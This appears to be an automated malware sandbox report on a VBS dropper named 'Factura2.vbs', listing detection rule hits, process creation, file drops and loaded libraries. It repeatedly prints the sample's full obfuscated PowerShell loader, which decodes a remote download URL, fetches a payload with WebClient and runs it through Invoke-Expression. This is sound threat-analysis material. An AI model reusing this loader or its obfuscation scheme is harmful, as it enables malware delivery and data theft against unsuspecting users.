Source: amsi32_6136.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@15/10@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Merogastrula.Bes

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: #v	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: WABOpen	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: #v	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: 58	12_2_00383530

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Factura2.vbs

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
